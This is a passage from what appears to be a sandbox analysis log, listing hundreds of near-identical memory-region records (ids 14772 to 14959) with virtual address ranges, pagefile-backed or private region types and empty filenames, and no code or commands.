filename = "" Region: id = 14772 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14773 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14774 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14775 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14776 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14777 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14778 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14779 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14780 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14781 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14782 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14783 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14784 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14785 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14786 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14787 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 14788 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14789 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14790 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14791 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14792 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14793 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14794 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14795 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14796 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14797 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14798 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14799 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14800 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14801 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14802 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14803 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14804 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14805 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14806 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14807 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14808 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14809 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14810 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14811 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14812 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14813 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14814 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14815 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14816 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14817 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14818 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14819 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14820 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14821 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14822 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14823 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14824 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14825 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14826 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14827 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14828 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14829 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14830 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14831 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14832 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14833 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14834 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 14835 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14836 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14837 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14838 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 14839 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14840 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14841 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14842 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14843 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14844 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14845 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14846 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14847 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14848 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14849 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14850 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14851 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 14852 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14853 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14854 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14855 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14856 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14857 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14858 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14859 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14860 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14861 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14862 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14863 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14864 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14865 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14866 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14867 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14868 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14869 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14870 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14871 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14872 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14873 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14874 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14875 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14876 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14877 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14878 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14879 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14880 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14881 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14882 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14883 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14884 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14885 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14886 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14887 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14888 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14889 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14890 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14891 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14892 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14893 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14894 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14895 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14896 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14897 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14898 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14899 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14900 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14901 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14902 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14903 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14904 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14905 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14906 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14907 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14908 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14909 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14910 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14911 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14912 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 14913 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14914 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14915 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14916 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14917 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14918 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14919 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14920 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14921 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14922 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14923 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14924 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14925 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14926 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14927 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14928 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14929 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14930 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14931 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14932 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14933 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14934 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14935 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14936 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14937 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14938 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14939 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14940 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14941 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14942 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14943 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14944 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14945 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14946 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14947 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14948 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14949 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14950 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14951 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 14952 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 14953 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14954 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14955 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14956 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 14957 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 14958 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 14959 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 